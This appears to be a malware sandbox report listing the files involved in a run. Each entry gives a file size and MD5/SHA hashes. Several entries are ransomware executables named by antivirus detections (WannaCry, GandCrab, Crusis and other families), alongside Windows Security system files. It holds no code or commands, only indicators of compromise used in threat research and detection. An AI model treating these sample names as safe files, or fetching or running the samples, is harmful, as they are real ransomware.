- Filesize: 1KB
  MD5: 58ffaabd4f02822cf0d7a36b6f7cf663
  SHA1: 38c18f4c095442890df757f95f7a37ec4b49b055
  SHA256: 9f7d47d0a58eb2d21610091ecd6a7df85d67f9d1600d889407b19a7610b74f62
  SHA512: 71f0ee6c292f07247110f1014c489ecf24d14ea353442b26f4a14752a606350fe6c6939bb0b902a88b8728d077efe07f52a08d23a518ff95d8099f954f6e5d5f
- Filesize: 2KB
  MD5: 25d0b19a0ec34a39dfa3e177866f01a3
  SHA1: a3704d1f6499738ccd694bdd6008a850c6b2e453
  SHA256: f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
  SHA512: ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198
- Filesize: 153B
  MD5: 9542b61a1b1a67deb6f5608395efd465
  SHA1: 74158ed4ee52a7001a9831f80cd3ef60c081679a
  SHA256: 2fb0e6d5f7bab7d4446b8701d608cdec83cbada4f7d7e8c6ab43f5915a42742c
  SHA512: e2c1cbb8b8176257296593a5b72ddc22d6009f0e4c7c8c2ecce2faa234f0882e7b4d001c834a6d5846cced03fdc57da16294a5e6f73b8541cce9c805d204e41d
- Filesize: 78B
  MD5: c578d9653b22800c3eb6b6a51219bbb8
  SHA1: a97aa251901bbe179a48dbc7a0c1872e163b1f2d
  SHA256: 20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2
  SHA512: 3ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d
- Filesize: 64KB
  MD5: d2fb266b97caff2086bf0fa74eddb6b2
  SHA1: 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
  SHA256: b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
  SHA512: c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
- Filesize: 4B
  MD5: f49655f856acb8884cc0ace29216f511
  SHA1: cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
  SHA256: 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
  SHA512: 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
- Filesize: 944B
  MD5: 6bd369f7c74a28194c991ed1404da30f
  SHA1: 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
  SHA256: 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
  SHA512: 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
- Filesize: 212KB
  MD5: 2f2e7ef471eb0c5785552b4e4476eddc
  SHA1: bbeea16734e19f3fd081391612af51112f107d13
  SHA256: 63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be
  SHA512: d5414eb8b3ee49a00c9db617e20e16bb3058e449a1538df5e0ad61c5a935a95e9f25d52f93b79b5e783b5c404f9164de859ac76690ec00f50696fcb2a54b1221
- Filesize: 9.9MB
  MD5: f65b6e5c80643e85771e1b050cce51f3
  SHA1: e9d6ec45859868fda152fd19a0c977a439be40fa
  SHA256: 7e946b53dd48fc7d42a8812ab0450e1193ae21ee9990d812811224c3429ecfc5
  S
  SHA512: 63d3fb8b157c30fc155feedf01ba7f141e7251d9a424e056b8f6798ee1238dc6c5834938940c3fd445ed9c22a53841f389f3d553c6b53e52285030751e120c53
- Filesize: 9.9MB
  MD5: 9bb3e77f3a2b7329ca41979a783996ae
  SHA1: fb4d3e1fe06bab2bb9255f18b1e8e079fbf6de06
  SHA256: 08124c7d2c97ffd108f1b7c9bba86aaeff5a41d16c77fcf11b3a8c9504f93424
  SHA512: d1c4567034e479956c43660c4553d8aff2242dae7c414900747cdb0d59ace891bdf5774474e8509a8c33291dbf13561bfadd4758d77d2f60ae8e9cb262a08bf1
- Filesize: 81KB
  MD5: aeab74db6bc6c914997f1a8a9ff013ec
  SHA1: 6b717f23227d158d6aa566498c438b8f305a29b5
  SHA256: 18ccb2dd8af853f4e6221bb5513e3154ef67ae61cee6ec319a8a97615987dc4b
  SHA512: a2832b7720599361e2537f79a2597acb1a2d5633fdfe20a0d1075e9457683fdb1d5676d121c0bf1a825ff99512dcd924254f1151b50aae922acc0cc10f461036
- Filesize: 71KB
  MD5: 2bb3496c855e5f9f14005e36525f9ed7
  SHA1: a09598372eb8b825e762fc7c18b75c8ad6a70568
  SHA256: b4995be5f03dce5bf0443bfae4cf8cb2ec5b16ae3bb078333123927323aa0dca
  SHA512: d06d83683524c082886fe3fa5269ea1c9ec0c61d6835a9dde2b91d6bcbb02fa2bf0c2936c1f3c99a3ba741d7c688c1c3727b8a2a6fef03d8d5c00c3b448f2a68
- Filesize: 143KB
  MD5: ea3d64b8cebcbcc84e230733824d83ee
  SHA1: e59e4e9353b8d282e022ac0f5ecfaabdb6b91d24
  SHA256: 1baaaede2f7324b31f67f3d3ec98982c75a5438a1e83a5ddb6dd14d9fcf8e768
  SHA512: 03d08fd9b66eced2668b6fc83b1c7778b6689a504ccb93ec912935303595035138bf30aec95cada8b502833234c60f52fb65487843717e6d231fcc04217dbe82
- Filesize: 104KB
  MD5: 17bce334e63161d93954596cab85ce93
  SHA1: d9be6bf1b9b6415b12810ae3cdaac381746aac7a
  SHA256: 72187b58b87abab33c760fed3e1d295b8c6786e80490125cee138b424bc71e37
  SHA512: 98a915bbe67b6d5ce48f3d15135724a52d456ff1a0713da7b8febc24be7ea466e3405fec032212b1353e9675f2d044a7f13e514a5e4a1d82fa4905d7a2e7f262
- Filesize: 1.1MB
  MD5: c9f92d933589fe85deffb89ce3d08052
  SHA1: f9349a85d4097cdd3c011c8b267921af3c9c6552
  SHA256: a49b409b3ba4c6bce74fc5bf31ba53ba080b1a33cb83c92e5354b9164d030ea6
  SHA512: 87668439aa812f0a8672805039bf6667a1fa221435a1f5bf6c82fd66deeeb7d3ec2d33a04a45311cb50d59131f98c54d3624ed2cd5f269da69c62706808283e3
- Filesize: 180KB
  MD5: d8ed156b7acacba7ae93f64cd3a6c488
  SHA1: 368ca96eb8d569b8f3cb70e4bbf6a427902fea32
  SHA256: c68164809b0c27c93ebd87cbbb5f422463554cbc15b2b24ed86967947b11bf16
  SHA512: 107e66d42455e395fcdd032f0e5a2c555cd7cc435d5b3bc8fc213f02f3aab30f79b361e0df0b46b41d337249ef84a1b8ec3e3cfbce522ce00b1907d909447f97
- Filesize: 61KB
  MD5: 070df20954306ae7c97b8a04390fdf47
  SHA1: 064bc619ba2985f913d6ccb871286fcfad5e61cd
  SHA256: 93cc376d376b374585d417a499d2ab8026a8b5bafa58632c2e1e09cdc4063461
  SHA512: 13273dc5067511a46f8b6ac4124a10e6f816420f6fbf231ef09c2557b76443a7e0489182c6ddc29bb6fdb482719cbcb9b4f592f3b135bb1d955caf16a9402484
- Filesize: 1.5MB
  MD5: 72802b72dd0d697f1fedb7d8a1e6cef3
  SHA1: 6df67366b8efa36e738b26a58ecd4168b09bcd16
  SHA256: 1d15049774b483f8b063aea48e95a66d2dfd4dbdf376b1fa971fc8646605857d
  SHA512: 9f2d4fa88a46895e4ff9e50e815ed0ab652c900b3a7f50e76ccf7d43b484c58dbc635d8be0fe2138c9e9965a672dfad8aa1481f1191a4c6cdce2cda0f1b74ce8
- Filesize: 761KB
  MD5: 5ca73655bc3c1ddfa091c03ab6626b1d
  SHA1: 23aa306f7a06321f75e58bcd5f45361b6be9d6c8
  SHA256: f3764218a7843bbda56c7df7cc2ee9462898f67e8bc97e498d4851e2f58ab977
  SHA512: dc10b38b7117992e4db0116cdfed33b492ae5f6665d038524e2ce95609efb5b69a1230c62e43b2dfad26cfaf982e4772ed5470794c1764d25ade1219e8c65744
- Filesize: 2.2MB
  MD5: 48aea2ba1df0ead97735a2907308ebe4
  SHA1: 18a06b41e94241ac686c8cd583c7b58cd743416f
  SHA256: 3d21f3fd38219ba59a9793662d843219fc708e0cff619b3a4063cf8b4b4662de
  SHA512: b65d520f5652f639db555f99aa324c7a172172861e05f3e85563a56f10b4ab1094155e6e3580ff08254a885b8a434c7c53452402db47bd2731d9a17cd324c76b
- Filesize: 10KB
  MD5: ce6bdab775a6469b676462fca5195cb8
  SHA1: e373b3189d9d4231f961a0865d774217d9c4a1bc
  SHA256: 554e30c9fb50dcb48cb68064662c30e2fe8b48f9e4aad77e7c4f335ce3825f19
  SHA512: d0262f2831e36583e609eefdb410a416df61aa8c8ee884326b418455d737a8ccc7745f8aa8c181e981e554f845daaff462cba3a94593ef31b83edb0c4509b254
- Filesize: 57KB
  MD5: bac7dd23125b09f2909c25eb23e1f811
  SHA1: 2ef9a1f3d10399864c2ef63030ada29b8059c6f6
  SHA256: 8fad4082b691a9ef4191519175d1000fa44341e59a1a9db01f3df4ca3ede42c3
  SHA512: 95b6930a2add69c9f2b266680392b4948e7d04059074466f1fcd556a0cf09f464163cb5720409b80745e303c469c72edbd8b6036721f29b5601ed20d82b77688
- Filesize: 3.3MB
  MD5: c5b23d73fd8e234125e271cf00090a14
  SHA1: 686963d9b782bf7ad60651668a1d93eeb09b79d1
  SHA256: 8b0ffa63d874192350552d99392785e14faf36e2e4c91db0830eeb3d8197c2f2
  SHA512: f4847f02c742ad7e76098530ddfd21666695ce6be48e77ddee799e8f6b7a04079896f450ba78ab4926e629c1d32d38242a203ebfdbc90c096773d5153f86e9f6
- Filesize: 110KB
  MD5: 6b3210f989d523d133cda1ff8f9ff286
  SHA1: ab642dfe42597d1fdebcf0a93589502faa3ae600
  SHA256: 37b7eb8e8895eca62c3eedb3ba4ef381f5f51aed894e1651a78186c39c5db191
  SHA512: 80272375aace4b00acec3c7279683725351f0b0a54bee54e6d265bcd13cbdf52c6561236b386dbde81e882f1723dfaad7f3d8c6546abcf7a54d95b4e8ffbc69b
- Filesize: 22KB
  MD5: 3e3b975dd01db8c4e1804e07656ed0f2
  SHA1: f4f33520f9a9f084337a98672853587351726dfb
  SHA256: 97e0aa3d061f47faad6e8818cc4377d972edbeecd20791fd1de9786988224b11
  SHA512: 780fc536001d365681ca68229aac09a5eb8a7c0263641ad906222ed3306f359d0c1e5cc26d9a9373b9e7b925108292ce4c426f8442da0006333bb34dc9ebd343
- Filesize: 170KB
  MD5: 30865748c2848ec07115835a553b968c
  SHA1: 95c8fd6b2f685219670d2c85440fbbab9d6085ae
  SHA256: 220c04a51892082d70f2b7635f10a81b1a2d59fd22fbb0973b67bde193bb81b0
  SHA512: beb6cdbf46bb117ad59cba42da89d011cd24962eeb93bb1f8359e255ee70657c26798358c97fa38fc434a8fbd3f691635a17a13e3ddce2b57b5b280be447834d
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 24KB
  MD5: 640bff73a5f8e37b202d911e4749b2e9
  SHA1: 9588dd7561ab7de3bca392b084bec91f3521c879
  SHA256: c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502
  SHA512: 39c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a
- C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe
  Filesize: 19.7MB
  MD5: 389be2d6eaa3936e971c41bb2cf418d9
  SHA1: 1035eb142fd54b1616edd266de6df02aedbbc8cc
  SHA256: 86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8
  SHA512: 573662105f6e04906024aa79418f578ce6715126a9347344917c094e7588c15a32e51fd2f319897d72a30272f04d0d5c3222061debedd2203d6c7cc012d90688
- C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe
  Filesize: 1.3MB
  MD5: 227f717e5c9da15f1f50d4fc4d6ec89f
  SHA1: 7462f5f72cf37a162694545a5c619c8fd46ee35a
  SHA256: 6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5
  SHA512: 05166162ccc55e4d757e00ed9f27c0de5a3fbdfb0eaa8fe532c8517c74923d301399f91c21bd4b4f5a2c192bc7ac8bf4c0a19753463194acb1b01105f0987639
- C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
  Filesize: 3.9MB
  MD5: 4c39c19ba724b4cbd95fb99059b002af
  SHA1: 48611238def49b0e86de0ce4ba7c1bff7ab1e0ac
  SHA256: 02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795
  SHA512: e7307f674d5699cc022ad528e1b417a52bf270fc4a2a92fb263faec7a9efb769ff3f32b861253ce5bfdb71d5cfcd280cd865392cb3639a29fde9d4eefc71c591
- C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
  Filesize: 190KB
  MD5: 6da5a1163c3c8264134b3366521ef78a
  SHA1: 8dc13c56d1998ab44176361fb8f9389eca75f415
  SHA256: 5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251
  SHA512: 5ead53b33ac55e2e14d64c14d6009d96dd62e468ad20270ca6b44658f557b91778b6a52a6124a9133d8d25a4d8155666f935c1c88b4650f3fd6738d0da4e7818
- C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe
  Filesize: 97KB
  MD5: b526084ac9ecb0e2071e178e7c642e29
  SHA1: feec210f08423776ea4cd3ef07da9c1841f337b9
  SHA256: 20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043
  SHA512: 49ad8917cb1355027091d294fba08ecfdcd55f5cb71ee6257c4a05cd8ab0abe42402acb3c9a17fae8a6d47db56f49911010482c39f8dbd949550b0d3b9056d26
- C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe
  Filesize: 322KB
  MD5: 04cf403611bb7732bbf874a2ad70b799
  SHA1: a514f5eb0498497ce2415d591f3ed12e43567e6f
  SHA256: e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c
  SHA512: 2272750b5d8bcc36dc083eedb853d9f28dd361983264f471325488c5075370935a2e23adc859db74ee737af86c36c65ea49eebd80c51e119fdb2794cef97852b
- C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
  Filesize: 504KB
  MD5: e9454a2ff16897e177d8a11083850ec7
  SHA1: 6b6855931e69d27f5f2e2d828fbeb4db91688996
  SHA256: e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead
  SHA512: 9bd01ed32887cecefe3987991f3ae3a0375c1cb1bff8b49f795b000076c26a1bb938476e4383b60a3f1ac5de79f7cd3cf2520ef695908815c0fee55a17dcb021
- C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
  Filesize: 356KB
  MD5: 7f5d465cca054e46bf406d73b60bb2b6
  SHA1: ab74205e9f53e47098a5a2165d3e92804fd5c6d0
  SHA256: 898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05
  SHA512: 1cb2a266268076e5be028c1536632d11b146cf3e757859d8a9325ef5ac18fe2fdf383968b745a9757f7b32dd41888d7a8e536d23d9dc689bf5e71d3b99eb6961
- C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
  Filesize: 1.5MB
  MD5: a96f370194c664573a6194cff2bffb48
  SHA1: 14ea97ae1fb39104870c322d293b8e188fbe8dd4
  SHA256: ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f
  SHA512: 639c6e127668e7057263e6db7a7761711a52aaed082b1c0f863b8164248b124ad0b455f8fd86bc3d06fac0a68201695ee067c1e6789b3ae564edd93d874d8132
- C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
  Filesize: 7.9MB
  MD5: 44ae44b1318428dda1cb041167a58b84
  SHA1: 559c7628896672dc7dce4662ef4904dea2ff0c59
  SHA256: 815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad
  SHA512: d84e0b501ec4ac93c21b87277eb63254ead4ea6faadcacecfb9abd564b34c2069b76a32d827fe4a52b7e83fc75c75847bd7bc8d321e48ff2c1265e2327d5fdc7
- C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
  Filesize: 6.5MB
  MD5: 2e171a12b837a11f66bc7a9319ab0088
  SHA1: 7e8a217af97b3df69fa64d594cd4200ff9d1994a
  SHA256: b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81
  SHA512: db55894dee3f1378b8463c82ab0c9e996c5760b6e5afe4b101511b33e9b59ce90a44aa0e27ed038941db54e777a6b6a0333f3eeda54b71c607c152d2ba03591c
- C:\Windows\WinSxS\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.19041.746_none_9d44fd61d4c8aeec\SecurityHealthSystray.exe
  Filesize: 84KB
  MD5: 0a06a969020bad81eb958b587b93811f
  SHA1: 17b242ff5c27c1c3c3593581745c7517094888de
  SHA256: 79c84cb3e45d68a5c390ef3dd2c9eb9d5d205ec097e08be7154a287714cc54a9
  SHA512: 45e7e79a4b467843fffedfd84b1674f355fbeb1f785252affa0b36a7802ca4ecb6d7307474ab676c1a44220266bd7e9befe49f866c2eab8cb3be80edc8516452
- C:\Windows\WinSxS\amd64_windows-shield-provider_31bf3856ad364e35_10.0.19041.84_none_9d98e005fb7852ca\FeatureToastBulldogImg.png
  Filesize: 43KB
  MD5: f77c79b717217eb84b7051376c815d8a
  SHA1: df23e628d3351c403c296d3a3169179de1e32490
  SHA256: 5cbfd6ba6581582caa3ef2772630b906665bee0ae1b9cd562c05da09d9023d88
  SHA512: fe4f87e92b7f872cd4f2c767aea05a9804e8a6f053a58b1914d40de355af0ff05136b275feaeba12052b8b4fa27fb0b8e8008444b6656a4bb5718072974eea5d
- C:\Windows\WinSxS\amd64_windows-shield-provider_31bf3856ad364e35_10.0.19041.84_none_9d98e005fb7852ca\WindowsSecurityIcon.png
  Filesize: 816B
  MD5: 2551bd3743652c78c5f5934f76e9123d
  SHA1: a3f8e082ba3aa17a715b6536091c60fa10d6dcd2
  SHA256: 75524589c798656b82c39a4ffc9536639442e09903013b01177b2723e29c643c
  SHA512: ddf64fafbaff44d4127d2c42f534896c706ce13618a287d3c682c6395fa92d74adac99bde6d0a8565515484a9069feab425407a7f0951db5be6d0e92ee2f2329
- Filesize: 532B
  MD5: 25994370ef89a0cd17b390e9af744b53
  SHA1: 401a759d64989ab570e5abca8eb4f1c4c30764e5
  SHA256: 7a64e7f617de76ac498b7e0543c9992b666dce032725c25ba0abdfaf1ef8feb9
  SHA512: a2a705c9d58fb5f2e9e49a014da1b65a27670e616c4a53fb7c048a9d14d409d5dbc58202ccd87eb2dbad4d412b9c0d73eb50945b9838e1b812f90609e10fd25a
- \??\c:\users\admin\desktop\00403\heur-trojan-ransom.msil.encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe
  Filesize: 878KB
  MD5: ea9c0a193eb474d8aac552ccd65ce047
  SHA1: d88dd3fcb954b2c33b51a588784b1db9b23bae85
  SHA256: 6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab
  SHA512: c0c7dd5b3ca0199562dfd46bc0ea0570fdd0800d34c1fd595a272198e6372e7dccb1ebeeb000da88d24c42af3d48f44eb2f6f6fdae7cd555d4228ede50ba280a
- \??\c:\users\admin\desktop\00403\heur-trojan-ransom.win32.foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe
  Filesize: 8.1MB
  MD5: b55973a0a834c70064148209b9302d59
  SHA1: 6945159ac7c97fc629eee9ec738cb69d34c5b6ca
  SHA256: c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f
  SHA512: bf4470b250406f45c12a9043c0e86528117e9dac149a0a9a234dd663926115b109926fa04ec1373586db627789a0f8c11a866e58f5a823f67d15d4b8334c583a